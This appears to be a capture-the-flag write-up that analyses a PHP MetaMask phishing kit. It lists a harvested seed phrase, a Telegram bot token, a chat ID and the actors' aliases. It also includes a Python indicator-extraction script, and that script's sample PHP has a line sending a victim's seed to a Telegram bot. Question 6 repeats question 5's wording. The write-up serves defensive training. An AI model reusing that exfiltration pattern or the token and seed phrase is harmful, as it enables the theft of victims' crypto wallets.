GrabThePhisher WriteUp

Ali Haydar Toprak
3 min read · May 1, 2023


1-) Which wallet is used for asking the seed phrase?

Inspect the index and locate the metamask folder.

Go to the metamask directory and open metamask.php.

Bingo: the wallet name is found there.

Answer => Metamask

2-) What is the file name that has the code for the phishing kit?

Answer => metamask.php

3-) In which language was the kit written?

Answer => php

4-) What service does the kit use to retrieve the victim’s machine information?

Answer => Sypex Geo

5-) How many seed phrases were already collected?

geo — city — date

Answer => 3

6-) How many seed phrases were already collected?

Answer => father also recycle embody balance concert mechanic believe owner pair muffin hockey

7-) Which medium had been used for credential dumping?

Answer => telegram

8-) What is the token for the channel?

open metamask.php

Answer => 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10

9-) What is the chat ID of the phisher’s channel?

open metamask.php

Answer => 5442785564
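
Questions 7 to 9 come down to reading the Telegram exfiltration settings out of metamask.php. As an added example (not part of the original write-up or the challenge files), this Python sketch pulls the same kind of indicators out of kit source for an incident report; the sample PHP, its token, chat ID and the `geo-lookup.example` host are constructed, and the simple `$var = "literal";` pattern is an assumption about how a kit stores them.

```python
import re

# Constructed sample standing in for a kit's PHP source (not the challenge file).
SAMPLE_PHP = r'''<?php
$token = "1234567890:AAExampleTokenConstructedForDemo000";
$id = "1000000001";
$geo = file_get_contents("http://geo-lookup.example/json/" . $_SERVER['REMOTE_ADDR']);
$message = "Wallet: Demo | Seed: " . $_POST["data"];
file_get_contents("https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $id . "&text=" . urlencode($message));
'''

# $name = "literal";  (simple string assignments only)
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*(["\'])([^"\']*)\2\s*;')
# Telegram bot token shape: numeric bot id, colon, 35-character secret.
TOKEN_RE = re.compile(r'(?<![\w-])\d{8,10}:[\w-]{35}(?![\w-])')
HOST_RE = re.compile(r'https?://([A-Za-z0-9.-]+)')
# chat_id=<digits>  or  chat_id=" . $var
CHAT_RE = re.compile(r'chat_id=["\']?\s*\.?\s*(?:\$(\w+)|(-?\d+))')


def triage(php_source):
    """Return the exfiltration indicators found in one PHP file."""
    variables = {m.group(1): m.group(3) for m in ASSIGN_RE.finditer(php_source)}
    chat_ids = []
    for var, literal in CHAT_RE.findall(php_source):
        value = literal or variables.get(var)  # resolve "$id" to its assigned string
        if value and value not in chat_ids:
            chat_ids.append(value)
    hosts = sorted(set(HOST_RE.findall(php_source)))
    return {
        "bot_tokens": sorted(set(TOKEN_RE.findall(php_source))),
        "chat_ids": chat_ids,
        "hosts": hosts,
        "uses_telegram": "api.telegram.org" in hosts,
    }


def redact(token):
    """Keep the bot id and mask the secret so the finding can go in a report."""
    bot_id, _, secret = token.partition(":")
    return f"{bot_id}:{secret[:4]}..."


if __name__ == "__main__":
    report = triage(SAMPLE_PHP)
    report["bot_tokens"] = [redact(t) for t in report["bot_tokens"]]
    print(report)
```

The `hosts` list also surfaces any other outbound service the kit calls, which is where a geolocation lookup like the one in question 4 would show up.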

10-) What is the alias of the phish kit developer?

open metamask.php

Answer => j1j1b1s@m3r0

11-) What is the full name of the Phish Actor?

Request the Telegram channel's details.

Answer => Marcus Aurelius

12-) What is the username of the Phish Actor?

Request the Telegram channel's details.

Answer => pumpkinboii
